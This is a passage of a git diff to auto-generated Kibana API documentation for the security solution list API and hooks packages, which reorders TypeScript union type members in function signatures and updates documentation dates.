\"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" ], "path": "packages/kbn-securitysolution-list-api/src/list_api/index.ts", "deprecated": false, @@ -399,7 +399,7 @@ "signature": [ "({ http, id, namespaceType, signal, }: ", "ApiCallByIdProps", - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" ], "path": "packages/kbn-securitysolution-list-api/src/api/index.ts", "deprecated": false, @@ -432,7 +432,7 @@ "signature": [ "({ filterOptions, http, listIds, namespaceTypes, pagination, signal, }: ", "ApiCallByListIdProps", - ") => Promise<{ data: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }>" + ") => Promise<{ data: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }>" ], "path": "packages/kbn-securitysolution-list-api/src/api/index.ts", "deprecated": false, @@ -504,7 +504,7 @@ "section": "def-common.FindListsParams", "text": "FindListsParams" }, - ") => Promise<{ cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]; page: number; per_page: number; total: number; }>" + ") => Promise<{ cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]; page: number; per_page: number; total: number; }>" ], "path": "packages/kbn-securitysolution-list-api/src/list_api/index.ts", "deprecated": false, @@ -549,7 +549,7 @@ "section": "def-common.ImportListParams", "text": "ImportListParams" }, - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" ], "path": "packages/kbn-securitysolution-list-api/src/list_api/index.ts", "deprecated": false, @@ -743,7 +743,7 @@ "signature": [ "({ http, listItem, signal, }: ", "UpdateExceptionListItemProps", - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" ], "path": "packages/kbn-securitysolution-list-api/src/api/index.ts", "deprecated": false, @@ -1102,7 +1102,7 @@ "label": "type", "description": [], "signature": [ - "\"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\" | undefined" + "\"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\" | undefined" ], "path": "packages/kbn-securitysolution-list-api/src/list_api/types.ts", "deprecated": false diff --git a/api_docs/kbn_securitysolution_list_api.mdx b/api_docs/kbn_securitysolution_list_api.mdx index 84d4ee2455e59..0ffa0a08cf9c5 100644 --- a/api_docs/kbn_securitysolution_list_api.mdx +++ b/api_docs/kbn_securitysolution_list_api.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-list-api title: "@kbn/securitysolution-list-api" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-list-api plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-list-api'] --- import kbnSecuritysolutionListApiObj from './kbn_securitysolution_list_api.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_list_constants.mdx b/api_docs/kbn_securitysolution_list_constants.mdx index 70f737432ea24..1f3274e940be4 100644 --- a/api_docs/kbn_securitysolution_list_constants.mdx +++ b/api_docs/kbn_securitysolution_list_constants.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-list-constants title: "@kbn/securitysolution-list-constants" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-list-constants plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-list-constants'] --- import kbnSecuritysolutionListConstantsObj from './kbn_securitysolution_list_constants.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_list_hooks.devdocs.json b/api_docs/kbn_securitysolution_list_hooks.devdocs.json index 1d24c2e9c357d..ad642ef094b12 100644 --- a/api_docs/kbn_securitysolution_list_hooks.devdocs.json +++ b/api_docs/kbn_securitysolution_list_hooks.devdocs.json @@ -29,7 +29,7 @@ "\nThis adds an id to the incoming exception item entries as ReactJS prefers to have\nan id added to them for use as a stable id. Later if we decide to change the data\nmodel to have id's within the array then this code should be removed. If not, then\nthis code should stay as an adapter for ReactJS.\n\nThis does break the type system slightly as we are lying a bit to the type system as we return\nthe same exceptionItem as we have previously but are augmenting the arrays with an id which TypeScript\ndoesn't mind us doing here. However, downstream you will notice that you have an id when the type\ndoes not indicate it. In that case use (ExceptionItem & { id: string }) temporarily if you're using the id. If you're not,\nyou can ignore the id and just use the normal TypeScript with ReactJS.\n" ], "signature": [ - "(exceptionItem: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }) => { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }" + "(exceptionItem: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }) => { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }" ], "path": "packages/kbn-securitysolution-list-hooks/src/transforms/index.ts", "deprecated": false, @@ -44,7 +44,7 @@ "The exceptionItem to add an id to the threat matches." ], "signature": [ - "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }" + "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }" ], "path": "packages/kbn-securitysolution-list-hooks/src/transforms/index.ts", "deprecated": false, @@ -66,7 +66,7 @@ "\nThis removes an id from the exceptionItem entries as ReactJS prefers to have\nan id added to them for use as a stable id. Later if we decide to change the data\nmodel to have id's within the array then this code should be removed. If not, then\nthis code should stay as an adapter for ReactJS.\n" ], "signature": [ - "(exceptionItem: T) => T" + "(exceptionItem: T) => T" ], "path": "packages/kbn-securitysolution-list-hooks/src/transforms/index.ts", "deprecated": false, @@ -103,7 +103,7 @@ "\nTransforms the output of rules to compensate for technical debt or UI concerns such as\nReactJS preferences for having ids within arrays if the data is not modeled that way.\n\nIf you add a new transform of the input called \"myNewTransform\" do it\nin the form of:\nflow(addIdToExceptionItemEntries, myNewTransform)(exceptionItem)\n" ], "signature": [ - "(exceptionItem: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }) => { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }" + "(exceptionItem: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }) => { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | 